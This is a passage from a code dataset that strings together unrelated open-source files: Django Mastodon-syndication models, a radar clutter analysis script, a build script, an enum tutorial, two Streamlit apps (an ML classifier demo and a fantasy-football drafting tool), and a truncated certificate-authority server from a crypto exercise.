in_reply_to_id=None, tags=None, media_ids=None):\n self.status = status\n self.idempotency_key = 
idempotency_key\n self.in_reply_to_id = in_reply_to_id\n self.tags = tags\n self.media_ids = media_ids\n\nclass MastodonMediaUpload(object):\n \"\"\"\n An object to contain the necessary data to publish a Mastodon \n Media attachment.\n \"\"\"\n def __init__(self, file, thumbnail=None, description=None, focus=None):\n self.file = file\n self.thumbnail = thumbnail\n self.description = description\n self.focus = focus\n\n\nclass MastodonSyndicatable(models.Model):\n \"\"\"\n An abstract class to be inherited by Models that want to syndicate\n to Mastodon.\n \"\"\"\n\n syndicated_to_mastodon = models.DateTimeField(null=True)\n syndicate_to_mastodon = models.BooleanField(default=False)\n mastodon_status = GenericRelation(MastodonStatus, related_query_name=\"mastodon_status\")\n \n def is_syndicated_to_mastodon(self):\n return self.mastodon_status.all().exists()\n\n def to_mastodon_status(self):\n \"\"\"Return the content that should be the Status of a mastodon post.\"\"\"\n raise NotImplementedError(\"to_mastodon_status not implemented.\")\n \n def get_mastodon_idempotency_key(self):\n \"\"\"Return a string to use as the Idempotency key for Status posts.\"\"\"\n raise NotImplementedError(\"get_mastodon_idempotency_key not implemented.\")\n \n def get_mastodon_reply_to_url(self):\n \"\"\"Return the url that should be checked for the in_reply_to_id.\"\"\"\n raise NotImplementedError(\"get_mastodon_reply_to_url not implemented.\")\n\n def get_mastodon_tags(self):\n \"\"\"Return the tags that should be parsed and added to the status.\"\"\"\n raise NotImplementedError(\"get_mastodon_tags not implemented.\")\n \n def has_mastodon_media(self):\n \"\"\"Returns True if the Model has media to upload.\"\"\"\n return False\n \n def is_mastodon_favorite(self):\n \"\"\"Returns True if the interaction is a boost.\"\"\"\n return False\n \n def is_mastodon_boost(self):\n \"\"\"Returns True if the interaction is a boost.\"\"\"\n return False\n \n def is_mastodon_url(self, url):\n o = urlparse(url)\n\n return o.netloc == \"mastodon.online\"\n \n def get_mastodon_url(self):\n raise NotImplementedError(\"get_mastodon_url not implemented.\")\n \n def get_status_id_from_url(self):\n url = self.get_mastodon_url()\n\n if not url:\n return None\n \n if not self.is_mastodon_url(url):\n return None\n \n o = urlparse(url)\n\n path_parts = o.path.split(\"/\")\n\n if len(path_parts) != 3:\n return None\n \n return path_parts[2]\n\n def get_mastodon_media_image_field(self):\n \"\"\"Returns the ImageField for the media.\"\"\"\n raise NotImplementedError(\"get_mastodon_media_image_field not implemented.\")\n\n def get_mastodon_media_description(self):\n \"\"\"Returns the description for the media.\"\"\"\n raise NotImplementedError(\"get_mastodon_media_description not implemented.\")\n\n def get_mastodon_status_update(self):\n # Get the basic Mastodon Status object from the content.\n status = MastodonStatusUpdate(self.to_mastodon_status())\n\n status.idempotency_key = self.get_mastodon_idempotency_key()\n\n # Check the reply for a Mastodon Id.\n in_reply_to_id = MastodonSyndicatable.parse_mastodon_url(self.get_mastodon_reply_to_url())\n\n # If no Mastodon Id, append the reply to url to the end of the \n # Note content.\n if self.get_mastodon_reply_to_url() is not None and in_reply_to_id is None:\n status.status = f'{self.content}\\n\\n{self.in_reply_to}'\n # Otherwise add the reply_to_id\n elif self.get_mastodon_reply_to_url() is not None and in_reply_to_id is not None:\n status.in_reply_to_id = in_reply_to_id\n \n 
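        # Finally, fold the model's tags into the status text. add_hashtags (defined
        # below) appends each tag's to_hashtag() output, space-separated after a blank
        # line, e.g. "Hello fediverse" -> "Hello fediverse\n\n#indieweb #django"
        # (the tag names in this example are illustrative).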
status.status = MastodonSyndicatable.add_hashtags(status.status, self.get_mastodon_tags())\n \n return status\n\n def get_mastodon_media_upload(self):\n if not self.has_mastodon_media():\n return None\n\n media = self.get_mastodon_media_image_field()\n # https://stackoverflow.com/a/35974071/814492\n file = (media.name.split('/')[-1], media)\n\n media_upload = MastodonMediaUpload(file, description=self.get_mastodon_media_description())\n return media_upload\n\n @staticmethod\n def parse_mastodon_url(url):\n o = urlparse(url)\n\n if o.netloc.lower() != settings.MASTODON_INSTANCE.lower():\n return None\n\n pieces = o.path.split(\"/\")\n if len(pieces) < 3:\n return None \n \n mastodonUserPattern = re.compile(\"^@(.+)$\")\n mastodonStatusIdPattern = re.compile(\"^(.+)$\")\n\n if bool(mastodonUserPattern.match(pieces[1])) and bool(mastodonStatusIdPattern.match(pieces[2])): \n return pieces[2]\n\n return None\n \n @staticmethod\n def add_hashtags(status, tags):\n tagsToAppend = list()\n\n for tag in tags:\n tagsToAppend.append(tag.to_hashtag())\n\n if len(tagsToAppend) > 0:\n status += \"\\n\\n\"\n status += \" \".join(tagsToAppend)\n\n return status\n\n\n class Meta:\n abstract = True\n\nclass Reply(models.Model):\n title = models.CharField(max_length=64, null=True, blank=True)\n reply_to_url = models.URLField()\n content = models.TextField()\n author_name = models.CharField(max_length=100, null=True, blank=True)\n author_url = models.URLField(null=True, blank=True)\n author_photo = models.URLField(null=True, blank=True)\n published = models.DateTimeField(null=True, blank=True)\n url = models.URLField()\n updated_at = models.DateTimeField(auto_now=True)\n created_at = models.DateTimeField(auto_now_add=True)\n\nclass Repost(models.Model):\n repost_of_url = models.URLField()\n author_name = models.CharField(max_length=100, null=True, blank=True)\n author_url = models.URLField(null=True, blank=True)\n author_photo = models.URLField(null=True, blank=True)\n published = models.DateTimeField(null=True, blank=True)\n url = models.URLField()\n updated_at = models.DateTimeField(auto_now=True)\n created_at = models.DateTimeField(auto_now_add=True)\n\nclass Like(models.Model):\n like_of_url = models.URLField()\n author_name = models.CharField(max_length=100, null=True, blank=True)\n author_url = models.URLField(null=True, blank=True)\n author_photo = models.URLField(null=True, blank=True)\n published = models.DateTimeField(null=True, blank=True)\n url = models.URLField()\n updated_at = models.DateTimeField(auto_now=True)\n created_at = models.DateTimeField(auto_now_add=True)\n\nclass MastodonReply(Reply):\n id_str = models.CharField(max_length=40)\n in_reply_to_id_str = models.CharField(max_length=40)\n \n def get_permalink(self):\n return settings.SITE_URL + reverse('syndications:reply', args=[self.id])\n\n def delete(self, *args, **kwargs) -> Tuple[int, Dict[str, int]]:\n permalink = self.get_permalink()\n super().delete(*args, **kwargs)\n OutgoingContent.objects.get_or_create(content_url=permalink)\n\n def save(self, *args, **kwargs):\n super().save(*args,**kwargs)\n \n permalink = settings.SITE_URL + reverse('syndications:reply', args=[self.id])\n OutgoingContent.objects.get_or_create(content_url=permalink)\n MastodonStatusesToProcess.objects.get_or_create(id_str=self.in_reply_to_id_str)\n\n class Meta:\n constraints = [\n UniqueConstraint(\n fields=(\"id_str\",),\n name=\"unique_mastodon_id\",\n ),\n ]\n\nclass MastodonBoost(Repost):\n account_id_str = models.CharField(max_length=40)\n 
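    # Together, account_id_str and boost_of_id_str form the natural key for a boost;
    # the UniqueConstraint in Meta below enforces one row per account/status pair.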
boost_of_id_str = models.CharField(max_length=40)\n \n def get_permalink(self):\n return settings.SITE_URL + reverse('syndications:repost', args=[self.id])\n\n def delete(self, *args, **kwargs) -> Tuple[int, Dict[str, int]]:\n permalink = self.get_permalink()\n super().delete(*args, **kwargs)\n OutgoingContent.objects.get_or_create(content_url=permalink)\n\n def save(self, *args, **kwargs):\n super().save(*args,**kwargs)\n \n permalink = settings.SITE_URL + reverse('syndications:repost', args=[self.id])\n OutgoingContent.objects.get_or_create(content_url=permalink)\n MastodonStatusesToProcess.objects.get_or_create(id_str=self.boost_of_id_str)\n\n class Meta:\n constraints = [\n UniqueConstraint(\n fields=(\"account_id_str\", \"boost_of_id_str\"),\n name=\"unique_mastodon_account_id_str_boost_of_id_str\",\n ),\n ]\n\nclass MastodonFavourite(Like):\n account_id_str = models.CharField(max_length=40)\n favourite_of_id_str = models.CharField(max_length=40)\n\n def get_permalink(self):\n return settings.SITE_URL + reverse('syndications:like', args=[self.id])\n\n def delete(self, *args, **kwargs) -> Tuple[int, Dict[str, int]]:\n permalink = self.get_permalink()\n super().delete(*args, **kwargs)\n OutgoingContent.objects.get_or_create(content_url=permalink)\n\n def save(self, *args, **kwargs):\n super().save(*args,**kwargs)\n \n permalink = self.get_permalink()\n OutgoingContent.objects.get_or_create(content_url=permalink)\n MastodonStatusesToProcess.objects.get_or_create(id_str=self.favourite_of_id_str)\n\n class Meta:\n constraints = [\n UniqueConstraint(\n fields=(\"account_id_str\", \"favourite_of_id_str\"),\n name=\"unique_mastodon_account_id_str_favourite_of_id_str\",\n ),\n ]\n\nclass MastodonStatusesToProcess(models.Model):\n id_str = models.CharField(max_length=40)\n result = models.TextField()\n\n def __str__(self) -> str:\n return self.id_str\n\n def process(self):\n try:\n Syndication.update_mastodon_replies(self.id_str) \n except Exception as e:\n self.result = str(e)\n self.save()\n return\n \n try:\n Syndication.update_mastodon_boosts(self.id_str) \n except Exception as e:\n self.result = str(e)\n self.save()\n return\n \n try:\n Syndication.update_mastodon_favourites(self.id_str) \n except Exception as e:\n self.result = str(e)\n self.save()\n return\n \n\n self.delete() \n\n class Meta:\n constraints = [\n UniqueConstraint(\n fields=(\"id_str\",),\n name=\"unique_mastodon_id_str\",\n ),\n ]\n\nclass MastodonPushSubscription(models.Model):\n pk = 'X'\n\n singleton = models.CharField(max_length=1, null=False, primary_key=True, default=pk)\n privkey = models.CharField(max_length=100)\n auth = models.BinaryField()\n foreign_id = models.IntegerField()\n endpoint = models.URLField()\n alerts = models.JSONField()\n server_key = models.CharField(max_length=100)\n policy = models.CharField(max_length=10)\n\n def __str__(self):\n return self.endpoint\n \nclass MastodonPush(models.Model):\n access_token = models.CharField(max_length=50, null=True)\n body = models.TextField(null=True)\n icon = models.URLField(null=True)\n notification_id = models.CharField(max_length=40, null=True)\n notification_type = models.CharField(max_length=10, null=True)\n preferred_local = models.CharField(max_length=100, null=True)\n title = models.CharField(max_length=200, null=True)\n result = 
models.TextField(null=True)","repo_name":"blineberry/orangegnome","sub_path":"syndications/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":31506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36452239305","text":"import glob\nimport netCDF4 as nc\nfs=glob.glob(\"bZoneProfs/*clutter*.nc\")\nimport matplotlib.pyplot as plt\nclutDepthL=[]\njL=[]\nbzdL=[]\nbcfL=[]\nimport numpy as np\nfor f in sorted(fs):\n fh=nc.Dataset(f)\n bcf=fh[\"bcFree\"][:]\n bsfc=fh[\"bsfc\"][:]\n jRay=fh[\"jRay\"][:]\n pType=fh[\"pType\"][:]\n a=np.nonzero(pType[:,0]==1)\n bzdL.extend(fh[\"bzd\"][a[0]])\n\n jL.extend(abs(jRay[a[0]]-24))\n clutDepthL.extend(bsfc[a[0],0]-bcf[a])\n bcfL.extend(bcf[a])\n\njL=np.array(jL)\nclutDepthL=np.array(clutDepthL)\nbzdL=np.array(bzdL)\nbcfL=np.array(bcfL)\na=np.nonzero(clutDepthL==clutDepthL)\nclutDepthL=clutDepthL[a]\njL=jL[a]\nbzdL=bzdL[a]\nbcfL=bcfL[a]\nfor j in range(13,24):\n a=np.nonzero((jL==j) & (bzdL>165))\n b=np.nonzero((bzdL[a]-bcfL[a])>0)\n #print(\n a2=np.nonzero((jL==j) & (bzdL<165))\n b2=np.nonzero((bzdL[a2]-bcfL[a2])>0)\n print(len(a[0]),clutDepthL[a].mean(),len(b[0])/len(a[0]),\\\n len(a2[0]),clutDepthL[a2].mean(),len(b2[0])/len(a2[0]))\n\nplt.hist(clutDepthL)\n","repo_name":"mgrecu35/GPM_Research","sub_path":"bZone/clutDistrib.py","file_name":"clutDistrib.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43606251200","text":"import os\nfrom building import *\n\ncwd = GetCurrentDir()\n\nsrc = []\npath = []\n\nsrc += Glob('arm-2d-dev/Library/Source/*.c')\nsrc += Glob('arm-2d-dev/Helper/Source/*.c')\nsrc += Glob('arm-2d-dev/examples/common/asset/*.c')\nsrc += Glob('arm-2d-dev/examples/common/benchmark/*.c')\nsrc += Glob('arm-2d-dev/examples/common/controls/*.c')\npath += [cwd + '/arm-2d-dev/Library/Include']\npath += [cwd + '/arm-2d-dev/Helper/Include']\npath += [cwd + '/arm-2d-dev/examples/common/benchmark']\npath += [cwd + '/arm-2d-dev/examples/common/controls']\n\nif GetDepend('TINYSQUARE_USING_PIKASCRIPT'):\n for root, dirs, files in os.walk(cwd + '/pikascript'):\n for dir in dirs:\n src += Glob(os.path.join(root,dir,'*.c'))\n path += [os.path.join(root,dir)]\n os.chdir('pikascript')\n os.system(os.getcwd() + '/' + 'rust-msc-latest-win10.exe')\n\ngroup = DefineGroup('TinySquare', src, depend = ['PKG_USING_TINYSQUARE'], CPPPATH = path)\n\nReturn('group')\n","repo_name":"AlgoOy/TinySquare","sub_path":"library/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"31033549033","text":"from enum import Enum, unique\n\n# 为这样的枚举类型定义一个class类型,然后,每个常量都是class的一个唯一实例。Python提供了Enum类来实现这个功能:\nMonth = Enum(\"Month\", ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'))\n# 枚举它的所有成员:\n\nfor name, member in Month.__members__.items():\n print(name, '=>', member, ',', member.value)\n\n\n# value属性则是自动赋给成员的int常量,默认从1开始计数。\n# 如果需要更精确地控制枚举类型,可以从Enum派生出自定义类:\n\n@unique\nclass WeekDays(Enum):\n Sun = 0 # Sun的value被设定为0\n Mon = 1\n Tue = 2\n Wed = 3\n Thu = 4\n Fri = 5\n Sat = 6\n\n\n# @unique装饰器可以帮助我们检查保证没有重复值。\n# 访问这些枚举类型可以有若干种方法:\nday1 = WeekDays.Mon\nprint(day1)\nprint(WeekDays.Tue)\nprint(WeekDays[\"Tue\"])\nprint(WeekDays.Tue.value)\nprint(day1 == WeekDays.Tue)\nprint(day1 == WeekDays.Mon)\n# 枚举所有成员\nfor name, member in 
WeekDays.__members__.items():\n print(name, \"--\", member, \"--\", member.value)\n\n\n# 练习\n# 把Student的gender属性改造为枚举类型,可以避免使用字符串:\n@unique\nclass Gender(Enum):\n Male = 0\n Female = 1\n\n\nclass Student2(object):\n def __init__(self, name, gender):\n self.name = name\n self.gender = gender\n\n\n# 测试:\nbart = Student2('Bart', Gender.Male)\nif bart.gender == Gender.Male:\n print('测试通过!')\nelse:\n print('测试失败!')\n","repo_name":"whoareufcu/MyPython","sub_path":"test019_枚举.py","file_name":"test019_枚举.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27801371397","text":"import streamlit as st\r\nfrom sklearn import datasets\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n\r\ndef get_dataset(dataset_name):\r\n if dataset_name == \"Iris\":\r\n data = datasets.load_iris()\r\n elif dataset_name == \"Breast Cancer\":\r\n data = datasets.load_breast_cancer()\r\n elif dataset_name == \"Wine\":\r\n data = datasets.load_wine()\r\n X = data.data\r\n y = data.target\r\n return X, y\r\n\r\ndef add_parameter_ui(clf_name):\r\n params = dict()\r\n if clf_name == \"KNN\":\r\n K = st.sidebar.slider(\"K\",1,15)\r\n params[\"K\"] = K\r\n elif clf_name == \"SVM\":\r\n C = st.sidebar.slider(\"C\",0.01,10.0)\r\n params[\"C\"] = C\r\n elif clf_name == \"Decision Tree\":\r\n max_depth = st.sidebar.slider(\"max_depth\", 2, 15)\r\n params[\"max_depth\"] = max_depth\r\n else:\r\n max_depth = st.sidebar.slider(\"max_depth\", 2, 15)\r\n n_estimators = st.sidebar.slider(\"n_estimators\", 1,100)\r\n params[\"max_depth\"] = max_depth\r\n params[\"n_estimators\"] = n_estimators\r\n return params\r\n\r\ndef get_classifier(clf_name, params):\r\n if clf_name == \"KNN\":\r\n clf = KNeighborsClassifier(n_neighbors=params[\"K\"])\r\n elif clf_name == \"SVM\":\r\n clf = SVC(C=params[\"C\"])\r\n elif clf_name == \"Decision Tree\":\r\n clf = DecisionTreeClassifier(max_depth=params[\"max_depth\"],random_state=1)\r\n else:\r\n clf = RandomForestClassifier(n_estimators=params[\"n_estimators\"],\r\n max_depth=params[\"max_depth\"],random_state=1)\r\n return clf\r\n\r\ndef scale_data(X,method):\r\n if method == \"Standard Scaler\":\r\n scaler = StandardScaler()\r\n X = scaler.fit_transform(X)\r\n elif method == \"Min Max Scaler\":\r\n scaler = MinMaxScaler()\r\n X = scaler.fit_transform(X)\r\n else:\r\n X = X\r\n return X\r\n\r\nst.title(\"Simple Machine Learning Web App\")\r\n\r\nst.write(\"\"\"\r\n## Explore different Machine Learning classifier\r\n\"\"\")\r\nst.write(\"\"\"\r\n \"\"\")\r\n\r\ndataset_name = st.sidebar.selectbox(\"Select Dataset\", (\"Iris\",\"Breast Cancer\",\"Wine\"))\r\n\r\nclassifier_name = st.sidebar.selectbox(\"Select Classifier\",\r\n (\"KNN\",\"SVM\",\"Decision Tree\",\"Random Forest\"))\r\n\r\nscaling_method = st.sidebar.selectbox(\"Select Feature-Scaling Method\",\r\n (\"None\",\"Standard Scaler\",\"Min Max Scaler\"))\r\n\r\nX, y = get_dataset(dataset_name)\r\nst.write(\"shape of dataset\", X.shape)\r\nst.write(\"number of classes\", len(np.unique(y)))\r\n\r\nX = 
scale_data(X,scaling_method)\r\n\r\nparams = add_parameter_ui(classifier_name)\r\n\r\n\r\n\r\nclf = get_classifier(classifier_name,params)\r\n\r\n# Classification\r\nX_train, X_test, y_train, y_test = train_test_split(X,y, test_size=0.2, random_state=1)\r\n\r\nclf.fit(X_train,y_train)\r\ny_predict = clf.predict(X_test)\r\n\r\nacc = accuracy_score(y_test,y_predict)\r\nst.write(f\"classifier = {classifier_name}\")\r\nst.write(f\"accuracy = {acc}\")\r\n\r\n# PLOT\r\npca = PCA(2)\r\nX_projected = pca.fit_transform(X)\r\n\r\nx1 = X_projected[:, 0]\r\nx2 = X_projected[:, 1]\r\n\r\nfig = plt.figure()\r\nplt.scatter(x1, x2, c=y, alpha=0.8, cmap=\"viridis\")\r\nplt.xlabel(\"Principal Component 1\")\r\nplt.ylabel(\"Principal Component 2\")\r\nplt.colorbar()\r\n\r\nst.pyplot(fig)\r\n\r\n# TODO\r\n# Add more parameters\r\n# Add more classifier\r\n# Add visualization of classifier boundaries\r\n\r\n\r\n","repo_name":"janS95/simple_ml_web_app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3141119357","text":"# Import libraries and dependencies\r\nimport streamlit as st\r\nimport pandas as pd\r\nfrom sklearn.cluster import KMeans\r\nimport matplotlib.pyplot as plt\r\nimport plotly.express as px\r\nfrom PIL import Image\r\n\r\n# Load images\r\nnfl_logo = Image.open('images/Logo.png')\r\nplayers = Image.open('images/players.jpg')\r\n\r\n# Read csv file with players data\r\ndf = pd.read_csv(\"data.csv\")\r\n\r\n# Group by player and get average scores\r\ndf_grouped = df.groupby(\"Player\").mean().reset_index()\r\n\r\n# Get back players' positions \r\ndf = pd.merge(df_grouped, df[[\"Player\",\"Position\"]], on ='Player', how ='inner').drop_duplicates()\r\n\r\n# Round scores to 2 decimlas values\r\ndf[\"FPTS\"] = round(df[\"FPTS\"],2)\r\ndf[\"FPTS/G\"] = round(df[\"FPTS/G\"],2)\r\n\r\n# Load NFL Logo image in APP\r\nst.image(nfl_logo, use_column_width=\"always\")\r\n#tryhing to add a gif image\r\n#st.markdown(\"![Alt Text](https://giphy.com/gifs/nfl-49ers-san-francisco-l1AvAJ3Ixl96eBR60)\")\r\n\r\n# User's information input section on sidebar\r\nst.sidebar.header(\"My Information\")\r\nst.sidebar.text_input(\"First Name\")\r\nst.sidebar.text_input(\"Last Name\")\r\nst.sidebar.text_input(\"Fantasy Team Name\")\r\nst.sidebar.radio(\"Gender\",options=[\"Male\",\"Female\",\"Other\"])\r\nst.sidebar.number_input(\"Age\",min_value=18, max_value=100, value=18, step=1)\r\nst.sidebar.selectbox(\"Favorite Team\", options=[\"Arizona Cardinals\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Atlanta Falcons\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Baltimore Ravens\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Buffalo Bills\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Carolina Panthers\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Chicago Bears\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Cincinnati Bengals\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Cleveland Browns\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Dallas Cowboys\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Denver Broncos\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Detroit Lions\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Green Bay Packers\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Houston Texans\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Indianapolis Colts\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Jacksonville Jaguars\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Kansas City Chiefs\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Miami Dolphins\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Minnesota Vikings\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"New England Patriots\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"New Orleans 
Saints\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"NY Giants\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"NY Jets\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Las Vegas Raiders\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Philadelphia Eagles\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Pittsburgh Steelers\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Los Angeles Chargers\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"San Francisco 49ers\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Seattle Seahawks\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Los Angeles Rams\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Tampa Bay Buccaneers\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Tennessee Titans\",\r\n\t\t\t\t\t\t\t\t\t\t\t\t\"Washington Football Team\"])\r\n\r\n# Instructions section\r\nst.header(\"Instructions\")\r\nst.markdown(\"Select players position. Then specifiy what round you will be drafting in. Click the 'Get best player available' button. The result will provide you with the best player available for your fantasy team.\")\r\nst.markdown(\"LETS GET STARTED\")\r\n\r\n# Drafting section\r\nst.header(\"Place 'Sure' Bet!\")\r\n\r\n# Load players; image\r\nst.image(players, use_column_width=\"always\")\r\n\r\n# Position radio button\r\nposition = st.radio(\"Please select the player's position:\", options=df[\"Position\"].unique())\r\n\r\n# Round select \r\nround_ = st.number_input(\"Specify what round you are drafting in:\",min_value=1, max_value=10, value=1, step=1)\r\n# Run button\r\nif st.button(\"Get best player available\"):\r\n\r\n\t# Filter dataframe with selected position only\r\n\tdf_sorted = df[df[\"Position\"]==position].sort_values(\"FPTS\", ascending=False)\r\n\t# Transpose dataframe\r\n\tst.dataframe(df_sorted.transpose().iloc[:,round_-1:round_])\r\n\r\n\t# K-Means Clustering Algorithm\r\n\tst.header(\"Players Clusters\")\r\n\tst.markdown(f\"Now that we have found the best player in the {position} position, it would be interesting to know how players could be grouped into 3 clusters: great players, decent players and bad players based on their historical Fanatsy Points.\")\r\n\tst.markdown(\"In order to acheve this, lets apply **machine learning**! For this task, we will be applying an unsupervised machine learning technique for groupuing the players: K-Mean Clustering. Players in segment 2 will be considered as great players; players in segment 1 will be considered as decent players; and players in segment 0 will be considered as bad players.\")\r\n\r\n\t# Set \"Player\" column as index for the dataframe\r\n\tdf_sorted.set_index(\"Player\",inplace=True)\r\n\r\n\t# Extract only FPTS and FPTs/G columns for analysis\r\n\tdf_sorted = df_sorted[[\"FPTS\",\"FPTS/G\"]]\r\n\r\n\t# Instantiate KM model and fit it to the data\r\n\tmodel = KMeans(n_clusters=3, random_state=1).fit(df_sorted)\r\n\t\r\n\t# Get players segments\r\n\tplayer_segments = model.labels_\r\n\t\r\n\t# Add \"Player Segment\" column to dataframe\r\n\tdf_sorted[\"Player Segment\"] = player_segments\r\n\r\n\t# Reset the index\r\n\tdf_sorted.reset_index(inplace=True)\r\n\r\n\t# Build interactive plotly scatter plot\r\n\tfig = px.scatter(\r\n\t\tdf_sorted,x=df_sorted[\"FPTS\"], \r\n\t\ty=df_sorted[\"FPTS/G\"], \r\n\t\tcolor=df_sorted[\"Player Segment\"], \r\n\t\thover_data=[\"Player\"], \r\n\t\ttitle=\"Player's Clusters based on Performance\"\r\n\t\t\r\n\t)\r\n\tst.plotly_chart(fig)\r\n\r\n\tst.markdown(\"Great! 
The scatter plot above allows us to identify which player belongs to which cluster, and this should help us make a better decision when drafting them.\")\r\n\tst.markdown(f\"Finally, let's take a look at the data set of {position} players sorted by their Fantasy Points in descending order:\")\r\n\r\n\t#3 Visualize filtered dataframe\r\n\tst.dataframe(df_sorted, width=5000)","repo_name":"Schaakattack/Sure_Bet","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5203,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"41698465541","text":"import pandas as pd\nimport numpy as np\n\n\ndef create_df(col_names, data=None, name=None):\n '''pd.DataFrame(\n [('Ziggy Stardust', 1), ('Aladdin Sane', 1), ('Pin Ups', 1)],\n columns=['title','toprank'])'''\n if data is None:\n df = pd.DataFrame(columns=col_names)\n else:\n df = pd.DataFrame({col: data for col in col_names})\n\n if name is not None:\n df.name = name\n return df\n","repo_name":"GabriellaPeng/Testing","sub_path":"code_da/get_data/load_df.py","file_name":"load_df.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41174181848","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.frontal),\n path('prueba/', views.prueba, name='prueba'),\n path('enviar/', views.enviar, name='enviar'),\n path('index.html/', views.peticiones, name='peticiones'),\n path('index.html/FFU.html/', views.FFU, name='FFU'),\n path('index.html/FFC.html/', views.FFC, name='FFC'),\n path('ayuda/', views.archivo, name='ayuda'),\n]","repo_name":"Diegomrza/IPC2_P3_1S_2021","sub_path":"misitio/myapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26719372699","text":"\n# standard libraries\nimport logging\nimport time\nfrom _thread import start_new_thread\nimport traceback\n\n# local library crypto\nimport run_node\nfrom run_node import servers_config_data, nodes_config_data, config, KEY_CHARSET, SENTINEL\nfrom run_node import SKca\nfrom crypto import KeyManager, DES\nimport rsa\nfrom node import Node\nfrom server import Server\n\n# ID for this node in PKI\nID_pki = 'ID-CA'\n\n# corresponding section in configuration file\nSECTION = 'CertificateAuthority'\n# load server data\nSERVER = servers_config_data[SECTION]\n# load node data\nNODE = nodes_config_data[SECTION]\n\n# RSA(.) denotes RSA encryption with the specified public key\n# DES(.) means DES encryption with the specified DES key\n# Sign(.) 
is RSA signature generation with the specified private key\n\n\ndef receiveThread(server):\n old_tb = None\n exit_instruction = f'Type \"{SENTINEL}\" to exit: '\n print(end=exit_instruction, flush=True)\n # loop indefinitely\n while True:\n try:\n print()\n print()\n # (a) application server registration to obtain its public/private\n DES_tmpl, ID_s = receive_certificate_registration(server)\n send_certificate(server, DES_tmpl, ID_s)\n\n # repeat the exit instruction\n print(end=exit_instruction, flush=True)\n # accept next connection\n server.acceptNextConnection()\n except Exception as e:\n tb = traceback.format_exc()\n # don't repeat the trackback\n if (tb != old_tb):\n print(file=stderr)\n logging.error(tb)\n old_tb = tb\n print(end=exit_instruction, flush=True)\n # end while True\n\n\ndef respondCertification(node_data, server_data):\n # configure the logger\n logging.basicConfig(level=logging.INFO)\n\n # create the Certificate Authority server\n AD_ca = f'{server_data.addr}:{server_data.port}'\n logging.info(f'{node_data.connecting_status} {AD_ca} . . .')\n server = Server(server_data.addr, server_data.port)\n\n start_new_thread(receiveThread, (server,))\n\n while True:\n # TODO: your code here\n\n # accept user input until SENTINEL given\n msg_string = input()\n if msg_string == SENTINEL:\n break\n\n # close the node\n server.close()\n\n\ndef receive_certificate_registration(server):\n # (1Rx) S -> CA: RSA[PKca][K_tmpl||ID_s||TS1]\n # receive the message\n cipher_msg = run_node.recv_blocking(server).decode(KEY_CHARSET)\n print(f'(a1) CA Received: {cipher_msg}')\n # decode the registration\n plain_msg = rsa.decode(*SKca, cipher_msg)\n # split it into its fields\n K_tmpl_str, ID_s, TS1 = plain_msg.split('||')\n # encode the key, and create its DES object\n K_tmpl_byts = K_tmpl_str.encode(KEY_CHARSET)\n DES_tmpl = DES(K_tmpl_byts)\n print(f'(a1) CA found key: 